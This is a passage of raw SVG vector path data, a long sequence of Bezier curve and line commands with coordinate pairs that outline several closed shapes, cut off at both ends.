394.57037,306.67129 394.83621,306.95094 398.08458,306.32674 C 399.50609,306.05358 401.3843,304.61944 402.25837,303.13975 C 403.71847,300.668 403.7116,300.27283 402.1738,298.27606 C 401.25321,297.08071 399.375,295.68536 398,295.17528 C 394.73744,293.96497 385.44806,294.20979 385.67897,295.5 C 385.7774,296.05 385.2149,296.85986 384.42897,297.29969 C 382.90834,298.15068 382.42558,302 383.83948,302 C 384.72721,302 387,306.391 387,308.10607 C 387,308.66265 386.56271,308.84777 386.02825,308.51746 C 385.49378,308.18714 383.95624,308.63779 382.61149,309.5189 C 380.55084,310.8691 379.83319,310.91493 378.04612,309.81046 C 375.39344,308.17103 374.33845,304.28896 375.87636,301.82638 C 376.81459,300.32402 376.74592,299.83973 375.52839,299.37252 C 374.69409,299.05237 374.2175,298.45709 374.4693,298.04968 C 374.7211,297.64226 372.8562,298.35735 370.32509,299.63876 C 367.43268,301.10308 364.84578,301.74841 363.36153,301.37589 C 361.26272,300.84912 361,301.1255 361,303.86021 C 361,306.1845 361.36695,306.79642 362.5,306.36163 C 363.325,306.04504 364,306.21265 364,306.73408 C 364,307.25552 361.674,308.94811 358.83112,310.4954 L 353.66224,313.30865 L 351.55318,310.85672 C 349.7938,308.81132 348.74504,308.47146 345.22763,308.8069 C 342.90856,309.02806 341.26019,309.61198 341.56459,310.1045 C 341.86898,310.59703 341.64148,311 341.05902,311 C 340.47656,311 340,310.325 340,309.5 C 340,308.52778 341.05556,307.95602 343,307.875 C 344.65,307.80625 346.45,307.6375 347,307.5 C 347.55,307.3625 348.53601,307.19375 349.19113,307.125 C 349.86032,307.05477 349.57485,306.40961 348.53964,305.65264 C 347.30924,304.75295 347.06708,304.07658 347.8108,303.61693 C 348.62845,303.1116 348.62605,302.27337 347.80178,300.46429 C 346.96719,298.63258 346.97398,297.35252 347.82821,295.47769 C 348.95102,293.01339 348.89662,292.96429 345.46286,293.34268 C 342.99604,293.61453 341.68405,293.25784 341.06197,292.14624 C 340.54603,291.22432 338.76835,290.52648 336.80795,290.47631 C 332.60494,290.36874 331,289.41155 331,287.01241 C 331,285.98416 330.30643,284.44928 329.45873,283.60158 C 328.07036,282.21322 328.07885,281.73489 329.54428,278.78015 C 330.43903,276.97607 332.3701,274.46223 333.83555,273.19385 L 336.5,270.88771 L 331.5,273.19385 C 328.75,274.46223 326.21281,275.89515 325.8618,276.37812 C 325.5108,276.86108 324.72521,276.9482 324.11606,276.57173 C 323.47293,276.17426 322.49225,277.06402 321.77735,278.69361 C 321.10021,280.23713 319.7483,282.22778 318.7731,283.1173 C 317.79789,284.00681 317,285.19616 317,285.76031 C 317,286.32445 316.29397,287.05695 315.43105,287.38809 C 314.46074,287.76043 314.08033,288.67774 314.43405,289.79221 C 314.74862,290.78334 315.18225,294.13174 315.39767,297.23311 C 315.80318,303.07117 315.26731,304.19219 310.50999,307.45804 C 308.5734,308.78749 308.59354,308.85768 311.25999,310.0726 C 312.767,310.75924 314,311.63955 314,312.02885 C 314,312.41814 315.84794,312.98452 318.10654,313.28746 C 320.90458,313.66276 323.17286,314.81995 325.2252,316.91913 C 326.88186,318.61361 328.63392,320 329.11866,320 C 329.6034,320 330,320.62554 330,321.39009 C 330,322.39659 330.94669,322.6526 333.43075,322.31784 C 335.31766,322.06356 337.76244,322.33768 338.8636,322.927 C 340.51655,323.81163 340.97614,323.65052 341.499,322.00316 C 341.84731,320.90573 341.55324,318.40649 340.84551,316.4493 C 339.75316,313.42846 339.78094,312.75022 341.02936,311.96069 C 342.95053,310.7457 344,310.75959 344,312 C 344,312.55 343.27252,313 342.38337,313 C 341.14356,313 340.94765,313.52446 341.54287,315.25 C 342.61068,318.34555 342.3031,325.92986 341.04846,327.44161 C 340.48135,328.12494 340.25352,328.92019 340.54218,329.20884 C 340.83083,329.4975 339.20734,330.03104 336.93441,330.3945 C 332.28069,331.13866 330,332.9236 330,335.82158 C 330,336.90202 329.34965,338.03559 328.55478,338.34061 C 327.43107,338.77181 327.31394,339.60784 328.02827,342.09857 C 329.65622,347.77489 334.8151,350.7849 337.8,347.8 C 338.73333,346.86667 339,347.17622 339,349.19301 C 339,353.3736 344.19703,354.35783 348.79049,351.04716 C 350.28072,349.97311 352.7375,348.79932 354.25,348.43876 C 356.84568,347.81997 357,347.97698 357,351.2366 C 357,355.05388 359.47553,358.00946 362.8881,358.26652 C 364.04965,358.35402 365,358.77985 365,359.2128 C 365,359.64576 365.675,360 366.5,360 C 367.325,360 368,360.49814 368,361.10699 C 368,361.71583 368.71156,361.94093 369.58125,361.60719 C 371.58257,360.83922 374.52717,362.95393 374.65362,365.25 C 374.97773,371.13492 374.88609,371 378.55902,371 C 380.84585,371 381.88019,371.38483 381.45266,372.07659 C 381.08671,372.66871 381.73515,374.03624 382.89365,375.11554 C 385.40024,377.45079 385.4205,377.67005 383.47454,381.40151 C 382.57441,383.12755 382.24942,385.15317 382.67234,386.40151 C 383.06336,387.55568 383.25863,389.3473 383.10627,390.3829 C 382.87853,391.93088 383.30983,392.17393 385.53104,391.74931 C 388.45744,391.1899 392,393.79149 392,396.5 C 392,397.35244 392.89772,398 394.07946,398 C 395.84933,398 396.06496,398.42776 395.52785,400.87321 C 395.06844,402.96489 395.31883,403.90837 396.44839,404.34182 C 398.83463,405.25751 398.37266,409.73421 395.75,411.10951 C 392.68186,412.71842 385.99958,418.01347 386.00179,418.83403 C 386.00277,419.20031 388.14027,420.81363 390.75179,422.41918 C 396.82072,426.15034 400.08113,429.05972 399.41016,430.14536 C 399.11965,430.61541 399.34995,431 399.92193,431 C 400.49391,431 401.26493,429.79264 401.63529,428.31697 z M 392.50622,407.99313 C 393.40046,407.005 394.2826,404.57732 394.46654,402.59827 C 394.73942,399.66212 394.46587,399 392.97993,399 C 391.76967,399 390.93792,397.99383 390.5,396 C 389.81791,392.89447 389.37801,392.66367 384.7282,392.97169 C 382.26701,393.13473 381.97933,392.83843 382.16103,390.32765 C 382.49077,385.77119 380.42569,382.99789 376.71482,383.01365 C 370.82219,383.03868 369.09359,384.00283 368.02153,387.86246 C 367.46582,389.86311 367.00864,391.81929 367.00558,392.20953 C 366.99609,393.41667 372.40217,398 373.83549,398 C 375.07751,398 379.82133,400.30744 382.67412,402.2992 C 383.56205,402.91913 383.50447,403.94171 382.4379,406.49438 C 381.04482,409.8285 381.06104,409.87374 383.76378,410.19038 C 387.92342,410.67772 390.71066,409.97719 392.50622,407.99313 z M 351.75871,392.01017 C 352.93341,390.91577 354.15768,390.44611 354.47929,390.9665 C 354.80091,391.48688 355.73037,391.65696 356.54476,391.34445 C 357.35915,391.03194 358.69474,391.33169 359.51273,392.01057 C 360.44429,392.78369 361,392.85031 361,392.18887 C 361,391.60805 362.21149,390.99045 363.69221,390.81642 C 365.78867,390.57002 366.57177,389.77207 367.23104,387.21049 C 368.24802,383.25906 371.52025,381.71934 377.92009,382.18083 C 382.02847,382.47709 382.40003,382.29982 383.09702,379.71098 C 383.68582,377.52399 383.4326,376.6626 381.92395,375.72043 C 380.86578,375.05959 380,373.95215 380,373.25945 C 380,372.52673 378.74534,372 377,372 C 374.85814,372 373.96349,371.49942 373.87238,370.25 C 373.3695,363.35444 373.12323,362.82743 370.28165,362.56613 C 369.30174,362.47602 365.90722,361.1316 362.73828,359.57853 C 358.40321,357.45395 356.83497,356.10419 356.40475,354.12738 C 355.29131,349.0112 355.24039,348.95811 352.46037,350.01507 C 351.02432,350.56105 349.17613,351.68102 348.35326,352.50388 C 347.5304,353.32675 345.94114,354 344.82158,354 C 343.26715,354 342.96128,354.41363 343.5275,355.75 C 344.17043,357.2674 344.55279,365.5 343.98033,365.5 C 343.86573,365.5 343.62523,366.7375 343.44589,368.25 C 343.26656,369.7625 343.5587,371 344.0951,371 C 344.70046,371 344.66856,371.75079 344.01098,372.97948 C 343.05334,374.76886 343.45425,379.06063 344.79893,381.41448 C 345.08626,381.91745 345.42494,383.64585 345.55155,385.25537 C 345.67817,386.86488 346.28087,388.68087 346.89088,389.29088 C 347.5009,389.9009 348,391.21 348,392.2 C 348,394.53318 349.11079,394.47708 351.75871,392.01017 z M 341.02855,375.75 C 342.05826,374.49707 342.66096,372.60566 342.38862,371.48182 C 342.11963,370.37182 342.2967,366.93103 342.78211,363.83563 C 343.73896,357.73386 342.29112,353 339.46806,353 C 338.66063,353 338,352.14213 338,351.09362 C 338,349.65936 337.48843,349.32102 335.93429,349.72743 C 332.7978,350.54765 329.39616,348.20493 327.44684,343.88211 C 325.81559,340.26464 325.80868,339.86889 327.34709,338.16896 C 328.25619,337.16442 329,335.73839 329,335 C 329,333.15337 331.99614,330 333.7507,330 C 335.69496,330 341,326.8016 341,325.6294 C 341,325.11275 339.99525,325.54727 338.76723,326.59501 C 336.75676,328.31034 336.67569,328.31818 337.95293,326.67378 C 339.88299,324.18891 337.98015,323.05906 332.85653,323.64768 C 330.59659,323.90732 329,323.66549 329,323.06356 C 329,322.49861 327.425,320.41456 325.5,318.43234 C 323.24441,316.10971 322,315.37542 322,316.3671 C 322,319.74398 319.59004,322.9802 316.25589,324.08056 C 313.82097,324.88416 312.3982,326.19606 311.41838,328.54111 C 309.70845,332.63355 308.0221,333.79088 306.84188,331.68193 C 306.32012,330.7496 305.2847,330.33726 304.35815,330.69281 C 303.08275,331.18222 302.90086,330.8287 303.43638,328.90127 C 304.07128,326.61618 304.03036,326.59135 302.59053,328.38814 C 301.45701,329.80268 301.33893,330.76478 302.11977,332.22379 C 302.69302,333.29492 302.95539,334.37794 302.70282,334.63052 C 302.45024,334.88309 303.42628,336.36938 304.87179,337.93338 C 308.85608,342.24425 309.45876,343.16117 311.23391,347.61271 C 312.13593,349.87471 314.03871,353.44181 315.46232,355.53961 C 316.88592,357.63741 318.33488,360.4861 318.68223,361.87004 C 319.54636,365.31301 322.94791,368.24562 330.01086,371.63692 C 333.29043,373.21161 335.97963,375.025 335.98686,375.66667 C 335.99777,376.63516 337.11896,377.52116 338.83971,377.92105 C 339.02655,377.96447 340.01153,376.9875 341.02855,375.75 z M 310,329.09597 C 310,326.93507 312.52968,324.50951 316.26412,323.08968 C 321.91036,320.94299 322.09053,314 316.5,314 C 315.25969,314 313.68469,313.325 313,312.5 C 311.14963,310.27044 306.92115,310.58552 306.28975,313 C 306.00209,314.1 305.34266,315 304.82435,315 C 304.30604,315 304.14086,315.41891 304.45729,315.9309 C 304.77373,316.4429 304.57528,317.14446 304.01631,317.48992 C 302.38366,318.49896 302.7419,323.31302 304.40223,322.67589 C 306.48692,321.87592 306.98901,322.8987 305.90773,325.74268 C 305.16619,327.69307 305.32747,328.70437 306.60523,330.11627 C 308.48904,332.19786 310,331.74374 310,329.09597 z M 384.94368,304.89477 C 384.41874,303.91391 383.54166,302.83477 382.99462,302.49668 C 381.75862,301.73278 381.67113,297 382.89301,297 C 384.50969,297 385.02169,293.87883 383.63284,292.48998 C 382.61678,291.47392 381.98333,291.41667 381.13571,292.26429 C 380.2881,293.1119 380,292.74615 380,290.82244 C 380,287.34646 377.55678,285.29302 375.47583,287.02006 C 374.63754,287.71578 374.15004,288.48338 374.3925,288.72583 C 374.63496,288.96829 373.98104,290.01896 372.93935,291.06065 C 370.82025,293.17975 371.3426,295.99586 373.85699,296.0078 C 376.17859,296.01883 377.88063,300.1004 376.68294,302.78454 C 375.98047,304.35882 376.16424,305.60171 377.37199,307.44497 C 378.99127,309.9163 379.07684,309.931 382.45855,308.31838 C 385.28494,306.97057 385.72797,306.36023 384.94368,304.89477 z M 313.65956,283.55521 C 313.33133,282.69985 312.12209,282 310.97237,282 C 309.82265,282 309.16008,282.45 309.5,283 C 309.83992,283.55 310.76648,284 311.55902,284 C 313.21743,284 313.48511,285.58215 311.98369,286.51008 C 311.42472,286.85554 311.2789,287.64225 311.65965,288.25831 C 312.61762,289.80835 314.42664,285.55418 313.65956,283.55521 z M 304.09692,286.61678 C 303.21168,285.55013 303.29809,285.09959 304.47448,284.64817 C 305.31351,284.3262 306,283.60829 306,283.05282 C 306,282.40733 305.09784,282.45393 303.5,283.18195 C 301.62248,284.03741 300.3658,284.03207 298.45295,283.16052 C 295.1771,281.66794 294.94604,281.69581 295.63837,283.5 C 295.95496,284.325 297.06583,285 298.10699,285 C 299.14814,285 300,285.47656 300,286.05902 C 300,286.64148 300.41891,286.85914 300.9309,286.54271 C 301.4429,286.22627 302.14446,286.42472 302.48992,286.98369 C 302.83538,287.54266 303.59658,288 304.18146,288 C 304.89195,288 304.8639,287.54093 304.09692,286.61678 z M 293.0338,277.81518 C 291.22015,274.83287 291.25801,267.6851 293.09953,265.40799 C 295.3248,262.65636 288.95228,262.90487 286.17928,265.67786 C 285.442,266.41515 284.44762,266.77664 283.96955,266.48118 C 283.49149,266.18572 282.61194,266.85659 282.01499,267.97199 C 280.137,271.48104 282.91445,274.57481 288.8807,275.61961 C 289.64008,275.75259 290.76508,276.4086 291.3807,277.0774 C 292.21767,277.98669 292.18565,278.11599 291.25376,277.59001 C 288.78375,276.1959 286.14767,276.17278 285.62278,277.54063 C 285.32829,278.30805 285.58722,279.24489 286.19818,279.62248 C 286.87084,280.03821 287.02756,279.85361 286.59549,279.15451 C 285.42348,277.25815 287.29983,277.90834 290.46589,280.49567 C 294.11986,283.48172 295.56344,281.97485 293.0338,277.81518 z M 335.60417,279.27083 C 334.58765,278.25432 333.74892,279.78472 334.58295,281.13421 C 335.21298,282.15363 335.44853,282.15442 335.78725,281.13825 C 336.01885,280.44346 335.93646,279.60312 335.60417,279.27083 z M 369.49292,278.01145 C 369.84326,277.44459 369.44186,277.27695 368.55194,277.61844 C 366.81952,278.28323 366.50255,279 367.94098,279 C 368.45852,279 369.1569,278.55515 369.49292,278.01145 z M 274.5,266 C 274.16008,265.45 273.20697,265 272.38197,265 C 271.55697,265 271.16008,265.45 271.5,266 C 271.83992,266.55 272.79303,267 273.61803,267 C 274.44303,267 274.83992,266.55 274.5,266 z M 272.51624,258.41547 C 272.53214,253.11428 272.47185,253 269.65925,253 C 267.75477,253 266.95833,253.42146 267.29708,254.25 C 267.57816,254.9375 268.11167,256.2542 268.48266,257.17599 C 269.00535,258.47473 268.52048,258.92492 266.32859,259.17599 C 264.30024,259.40834 263.41127,260.12379 263.18636,261.70492 C 262.93588,263.46581 263.54001,264.08614 266.18636,264.78533 C 271.16682,266.10121 272.49721,264.76242 272.51624,258.41547 z M 274.40044,258.60115 C 274.10521,257.83178 274.34433,256.90523 274.93183,256.54213 C 275.51932,256.17904 276,254.75697 276,253.38197 C 276,252.00697 275.58462,251.13868 275.07694,251.45245 C 273.84483,252.21393 272.68713,257.68474 273.48492,258.9756 C 274.41201,260.47566 275.02375,260.22546 274.40044,258.60115 z M 200.92611,231.41097 C 199.17181,229.29717 197.80263,229.71109 199.19168,231.93532 C 199.85642,232.99974 200.78209,233.63468 201.24871,233.34629 C 201.71533,233.0579 201.57017,232.18701 200.92611,231.41097 z M 197,228.64922 C 197,227.1819 194.63423,222 193.96432,222 C 192.85436,222 193.09676,226.16014 194.29936,227.75 C 195.159,228.88645 197,229.49945 197,228.64922 z M 191,212.821 C 191,209.95022 188.43191,204.95447 186.66847,204.39478 C 185.12617,203.90527 185.01495,203.60452 186.11787,202.90599 C 186.91402,202.40175 187.02195,202.02413 186.37244,202.01531 C 182.56885,201.96366 183.04615,208.31523 187,210.3665 C 188.375,211.07985 189.3875,212.18922 189.25,212.83175 C 189.1125,213.47429 189.45,214 190,214 C 190.55,214 191,213.46945 191,212.821 z M 322.29767,178.66667 C 322.57908,177.93333 322.17722,177.33333 321.40466,177.33333 C 320.6321,177.33333 320,177.93333 320,178.66667 C 320,180.39401 321.63483,180.39401 322.29767,178.66667 z M 303,165.83222 C 303,164.65241 300.24351,164.79698 299.48992,166.01631 C 299.14446,166.57528 298.49005,166.80287 298.03569,166.52206 C 297.58132,166.24124 296.97175,166.63125 296.68107,167.38873 C 296.24927,168.51398 296.77901,168.57371 299.57629,167.71521 C 301.45933,167.13728 303,166.28994 303,165.83222 z M 299.27666,158.16464 C 299.44398,155.78077 299.87626,155.13426 301,155.58723 C 305.72762,157.49289 305.59594,157.49229 304.05601,155.60103 C 303.07285,154.39355 301.76923,153.99615 299.97112,154.35578 C 298.51862,154.64628 296.13092,154.26175 294.66511,153.50128 C 292.20391,152.2244 290.73934,153.10283 293,154.5 C 293.55,154.83992 294,155.94333 294,156.95203 C 294,157.96073 294.675,159.04504 295.5,159.36163 C 296.325,159.67821 297,160.71635 297,161.66862 C 297,164.72922 299.03582,161.59592 299.27666,158.16464 z M 317.37804,161.19733 C 317.96375,160.24964 309.27283,160.39384 308.31903,161.34764 C 307.96023,161.70644 309.74011,162 312.27432,162 C 314.80852,162 317.1052,161.6388 317.37804,161.19733 z M 359.84502,157.52448 C 360.17089,155.87183 360.0212,155.8744 357.1494,157.57082 C 355.47705,158.5587 354.32361,159.7146 354.58621,160.13949 C 355.38343,161.42941 359.47637,159.39415 359.84502,157.52448 z M 367.43362,156.10222 C 368.49712,155.68575 368.94712,155.12569 368.43362,154.85764 C 367.08592,154.15411 365.7703,154.39093 363.5,155.7457 C 361.5,156.93918 361.5,156.93918 363.5,156.89931 C 364.6,156.87737 366.37013,156.51868 367.43362,156.10222 z M 364,154.60699 C 364,153.65836 361.00662,153.18027 360.47301,154.04367 C 360.14793,154.56965 360.80852,155 361.94098,155 C 363.07344,155 364,154.82314 364,154.60699 z M 373.03297,151.5 C 374.38998,149.64999 374.36876,149.60293 372.75,150.87244 C 371.7875,151.62729 371,152.71479 371,153.28911 C 371,153.86343 371.12734,154.14583 371.28297,153.91667 C 371.4386,153.6875 372.2261,152.6 373.03297,151.5 z M 345.43071,143.09738 C 345.16763,142.8343 344.1756,143.43005 343.22619,144.42128 C 341.5769,146.14322 341.59821,146.16453 343.70452,144.89961 C 344.91701,144.17146 345.69379,143.36046 345.43071,143.09738 z M 154.23496,142.83496 C 153.61252,142.21252 151.84252,141.65752 150.30162,141.60162 C 148.09522,141.52159 147.56197,141.07509 147.7917,139.5 C 148.03198,137.85254 147.90247,137.76441 147.05701,139 C 146.36529,140.01091 146.02563,140.09243 146.01531,139.25 C 146.00676,138.55205 144.78548,138.00839 143.25,138.019 C 140.70216,138.0366 140.85688,138.26206 145.35451,141.08589 C 148.02449,142.76222 150.82258,143.89832 151.57248,143.61056 C 152.32239,143.32279 153.22042,143.54763 153.56811,144.11021 C 153.9158,144.67278 154.46271,144.87062 154.78347,144.54986 C 155.10423,144.22911 154.8574,143.4574 154.23496,142.83496 z M 349.1875,142.31689 C 348.46562,142.02802 347.60312,142.06354 347.27083,142.39583 C 346.93854,142.72813 347.52917,142.96447 348.58333,142.92105 C 349.74828,142.87307 349.98523,142.63611 349.1875,142.31689 z M 367,141 C 366.175,140.46684 364.825,140.03063 364,140.03063 C 362.66667,140.03063 362.66667,140.13833 364,141 C 364.825,141.53316 366.175,141.96937 367,141.96937 C 368.33333,141.96937 368.33333,141.86167 367,141 z M 28.457295,117.0691 C 29.475347,115.42186 27.548306,115.13484 24.987451,116.5523 L 22.5,117.92913 L 25.190983,117.96456 C 26.671024,117.98405 28.140864,117.58109 28.457295,117.0691 z M 70,102 C 71.292687,101.1646 71.266292,101.02851 69.809017,101.01531 C 68.878976,101.00689 67.839919,101.45 67.5,102 C 66.717818,103.2656 68.041628,103.2656 70,102 z M 290.83869,90.957024 C 292.77738,89.775061 294.97884,89.175897 296.08869,89.52815 C 297.13991,89.861794 298,89.726683 298,89.227903 C 298,88.162418 293.5745,86 291.39393,86 C 290.47464,86 290.1586,85.510013 290.58769,84.75 C 291.1399,83.771892 291.01066,83.761712 289.99351,84.703196 C 289.06358,85.563945 288.14361,85.612039 286.76116,84.872176 C 284.54677,83.687071 284.48769,83.721768 283.55528,86.754926 C 283.06717,88.342756 283.32626,89.187966 284.43105,89.611915 C 285.29397,89.943049 286,90.840833 286,91.606989 C 286,93.481445 286.89532,93.361179 290.83869,90.957024 z M 302.1875,90.316886 C 301.46562,90.028015 300.60312,90.063542 300.27083,90.395833 C 299.93854,90.728125 300.52917,90.964474 301.58333,90.921053 C 302.74828,90.873069 302.98523,90.636112 302.1875,90.316886 z M 322.1257,87.577688 C 322.53056,87.827903 323.10861,87.633288 323.41025,87.145212 C 324.23476,85.811126 315.90149,84.982352 313.67016,86.176524 C 310.73381,87.748012 313.4639,88.910288 317.79636,87.93316 C 319.77264,87.487436 321.72085,87.327474 322.1257,87.577688 z M 287,81.940983 C 287,81.358524 287.41891,81.140864 287.9309,81.457295 C 288.4429,81.773726 289.14446,81.575283 289.48992,81.016312 C 290.19623,79.873477 288.95029,79.69811 286.58179,80.606989 C 284.83707,81.276499 284.41805,83 286,83 C 286.55,83 287,82.523442 287,81.940983 z M 309.25,68.337719 C 308.5625,68.060307 307.4375,68.060307 306.75,68.337719 C 306.0625,68.615132 306.625,68.842105 308,68.842105 C 309.375,68.842105 309.9375,68.615132 309.25,68.337719 z M 280.75,66.310674 C 279.7875,66.059147 278.2125,66.059147 277.25,66.310674 C 276.2875,66.562202 277.075,66.767997 279,66.767997 C 280.925,66.767997 281.7125,66.562202 280.75,66.310674 z M 283.83385,64.123851 C 284.90001,63.448009 284.83712,63.151475 283.52046,62.646226 C 282.61449,62.298571 282.12956,61.599382 282.44285,61.092473 C 282.75614,60.585564 282.51031,60.003438 281.89658,59.798859 C 281.16806,59.556019 281.29207,59.002489 282.25384,58.204296 C 283.49145,57.177173 283.68317,57.380848 283.45294,59.478159 C 283.22909,61.51736 283.48305,61.818534 284.83945,61.12244 C 285.75275,60.653738 287.175,59.979458 288,59.624039 C 288.825,59.268621 288.4875,59.165684 287.25,59.395292 C 284.70321,59.867828 284.23252,58.528885 286.49945,57.260246 C 287.4645,56.720177 285.86071,56.336671 281.99945,56.184181 C 278.40981,56.042419 276,56.359517 276,56.973625 C 276,57.538131 275.51786,58 274.92857,58 C 273.40973,58 271.5,60.22802 271.5,62 C 271.5,63.023275 272.93018,63.688432 276,64.092896 C 278.475,64.418989 280.95,64.749598 281.5,64.827584 C 282.05,64.905569 283.10023,64.588889 283.83385,64.123851 z M 334.21737,63.764947 C 332.52961,62.951839 331.63052,62.969476 330.76737,63.832627 C 329.87754,64.722458 330.42024,64.983909 333.05,64.93232 C 336.28999,64.868759 336.36105,64.797697 334.21737,63.764947 z M 240.53623,63.058616 C 240.21623,62.540855 241.20217,62.203355 242.72721,62.308616 C 246.62377,62.577565 246.4266,59.687008 242.5,58.977765 C 239.67486,58.467474 239.61657,58.366672 241.5,57.248353 C 243.3273,56.163364 243.21936,56.058192 240.25,56.030409 C 236.03298,55.990952 235.45088,56.227002 235.81842,57.827502 C 235.98609,58.557628 235.09668,59.423464 233.84195,59.751582 C 231.76481,60.294766 231.91592,60.50494 235.53032,62.099916 C 240.14461,64.136128 241.34415,64.365856 240.53623,63.058616 z M 289.5,62 C 289.16008,61.45 288.43197,61 287.88197,61 C 287.33197,61 287.16008,61.45 287.5,62 C 287.83992,62.55 288.56803,63 289.11803,63 C 289.66803,63 289.83992,62.55 289.5,62 z M 231.42689,59.104581 C 233.15102,58.429157 233.17733,58.282025 231.67689,57.706251 C 229.7496,56.96668 227,57.79019 227,59.106989 C 227,60.1592 228.7372,60.158255 231.42689,59.104581 z M 309.78934,58.848646 C 309.00359,58.350129 310.25761,57.999887 313,57.951926 C 316.49358,57.890828 317.03055,57.683452 315.40097,57.024687 C 314.24651,56.55799 311.25918,56.207028 308.76246,56.244773 C 305.16677,56.29913 304.28783,56.64466 304.53497,57.906699 C 304.70657,58.783015 304.88141,59.5375 304.92349,59.583333 C 304.96557,59.629167 306.36771,59.666667 308.03934,59.666667 C 309.99893,59.666667 310.62064,59.376056 309.78934,58.848646 z M 219,56.393011 C 219,56.176855 217.7625,56.006891 216.25,56.015313 C 214.24861,56.026457 213.88365,56.273494 214.90932,56.922793 C 216.18265,57.728876 219,57.364003 219,56.393011 z M 455.5,505.50876 C 452.35179,504.50013 451.87648,504.07231 453.26796,503.49974 C 455.18074,502.71265 461,504.68569 461,506.12132 C 461,507.18575 460.59278,507.1404 455.5,505.50876 z M 376.51652,498.02673 C 376.19721,497.51007 375.29691,497.33257 374.51586,497.63229 C 372.14722,498.54122 370.8015,497.05564 372.47634,495.3808 C 374.11727,493.73988 383.5,493.77897 383.5,495.42673 C 383.5,496.8046 377.2088,499.14686 376.51652,498.02673 z M 322.27495,496 C 322.35781,494.9 323.02068,494 323.74799,494 C 324.76049,494 324.81954,494.46867 324,496 C 322.641,498.53932 322.08367,498.53932 322.27495,496 z M 1168,492.55902 C 1168,492.31648 1168.45,491.83992 1169,491.5 C 1169.55,491.16008 1170,491.35852 1170,491.94098 C 1170,492.52344 1169.55,493 1169,493 C 1168.45,493 1168,492.80156 1168,492.55902 z M 827,487 C 827,484.95548 829.40735,484.23205 830.47301,485.95633 C 830.79808,486.48231 831.72464,486.65916 832.53203,486.34934 C 833.44736,485.99809 834,486.391 834,487.39301 C 834,488.5629 833.04801,489 830.5,489 C 827.66667,489 827,488.61905 827,487 z M 1174,479 C 1174.9395,477.24446 1174.7605,477 1172.5352,477 C 1171.1408,477 1170,476.50554 1170,475.90121 C 1170,474.13803 1175.6644,469.34088 1180.5242,466.98826 C 1183.2024,465.69178 1186.2802,463.04433 1188.1725,460.40936 C 1191.3633,455.96623 1194,454.67657 1194,457.55902 C 1194,458.55079 1194.4544,458.83722 1195.2488,458.34623 C 1197.3108,457.07183 1200.4608,457.4025 1201.0864,458.95904 C 1201.5487,460.10914 1202.2368,459.85409 1204.3364,457.7545 C 1205.8014,456.28952 1207,454.21924 1207,453.15386 C 1207,451.92167 1207.9097,450.9885 1209.5,450.58936 C 1213.5325,449.57726 1212.5105,447.47952 1207.9263,447.35932 C 1205.6857,447.30057 1203.3457,446.74569 1202.7263,446.12625 C 1201.0096,444.40964 1200.072,444.77764 1200.5,447 C 1200.7118,448.1 1200.461,449 1199.9426,449 C 1199.4242,449 1199,449.6375 1199,450.41667 C 1199,451.19583 1198.4375,452.0445 1197.75,452.3026 C 1197.0117,452.57978 1197.5233,453.20193 1199,453.82254 C 1200.375,454.40042 1200.825,454.89486 1200,454.9213 C 1199.175,454.94774 1197.8777,454.57524 1197.1171,454.09352 C 1195.958,453.35943 1195.9985,452.84029 1197.3671,450.88632 C 1199.6881,447.57265 1199.4534,446.38557 1195.3803,440.83698 C 1193.3895,438.12494 1191.9567,435.70998 1192.1963,435.47039 C 1192.4359,435.23081 1194.0494,435.56981 1195.7818,436.22374 C 1197.9426,437.03933 1199.1205,438.27208 1199.5328,440.14929 C 1199.949,442.04441 1200.5928,442.70974 1201.6266,442.31305 C 1202.579,441.94757 1203.3122,442.47767 1203.6521,443.77767 C 1204.2548,446.08249 1207.3335,447.20538 1210.7199,446.35546 C 1212.4133,445.93044 1213,446.21396 1213,447.45733 C 1213,450.28353 1211.075,452.966 1209.4847,452.35577 C 1208.474,451.96792 1208,452.43031 1208,453.80412 C 1208,454.91407 1206.6174,456.9856 1204.9275,458.40751 C 1202.5288,460.42593 1201.4472,460.77449 1199.9947,459.99716 C 1198.5288,459.21264 1198.0086,459.39748 1197.5416,460.86887 C 1197.2156,461.89592 1196.0908,463.51286 1195.0419,464.46207 C 1193.993,465.41128 1193.3649,466.78733 1193.646,467.51995 C 1193.9833,468.39893 1193.1951,468.96219 1191.3286,469.17599 C 1189.2965,469.40877 1188.0776,470.39267 1187,472.6702 C 1185.6268,475.57239 1179.4331,479.76647 1178.2571,478.59048 C 1177.9848,478.3181 1177.1083,478.74881 1176.3095,479.54762 C 1174.1604,481.69679 1172.7373,481.35936 1174,479 z M 1185.9879,471.30237 C 1187.6703,467.72327 1188.4373,467.00402 1190.032,467.51016 C 1191.2153,467.88573 1192,467.67342 1192,466.97768 C 1192,466.34128 1192.8809,465.07345 1193.9575,464.16029 C 1195.9792,462.44557 1196.9878,460.5 1195.855,460.5 C 1195.5002,460.5 1194.2627,459.64276 1193.105,458.59501 C 1191.9463,457.54637 1191,457.20923 1191,457.84501 C 1191,458.48026 1190.2125,459.85439 1189.25,460.89865 C 1188.2875,461.9429 1186.4361,463.97223 1185.1358,465.40826 C 1183.8355,466.84429 1181.5855,468.29815 1180.1358,468.63905 C 1176.4436,469.5073 1171.0406,475.80011 1173.75,476.07651 C 1175.8718,476.29296 1178.2407,476.90734 1178.6914,477.35807 C 1180.0132,478.67988 1184.1236,475.26848 1185.9879,471.30237 z M 1197.531,439.05022 C 1197.163,438.45466 1196.3949,438.25597 1195.8241,438.60869 C 1195.1523,439.02393 1195.2545,439.53928 1196.1143,440.07063 C 1197.719,441.06242 1198.4495,440.53632 1197.531,439.05022 z M 1228.5966,469.15623 C 1228.2505,468.59631 1228.4547,467.83704 1229.0502,467.46896 C 1230.5877,466.51875 1231.5797,467.82031 1230.2962,469.1038 C 1229.578,469.82198 1229.0187,469.83923 1228.5966,469.15623 z M 1097.2463,466.41859 C 1096.6389,465.76837 1095.9975,464.39569 1095.821,463.36819 C 1095.6444,462.34068 1094.8644,461.00257 1094.0875,460.39461 C 1093.3107,459.78664 1092.9528,458.56545 1093.2922,457.68084 C 1093.8042,456.34662 1094.4315,456.25447 1096.9724,457.14021 C 1100.8001,458.47458 1105.3997,457.48406 1104.6346,455.49015 C 1103.8174,453.36051 1105.7613,452.66197 1106.7722,454.72199 C 1108.1005,457.42861 1106.1723,467.2801 1104.4441,466.61692 C 1103.6851,466.32566 1102.8158,466.48906 1102.5123,466.98004 C 1101.7583,468.20009 1098.5955,467.86288 1097.2463,466.41859 z M 1102,465 C 1102,464.45 1102.6664,464 1103.4809,464 C 1104.8905,464 1106.7648,459.43147 1105.7653,458.43195 C 1105.5041,458.17075 1104.2401,458.34555 1102.9564,458.82041 C 1101.5463,459.34207 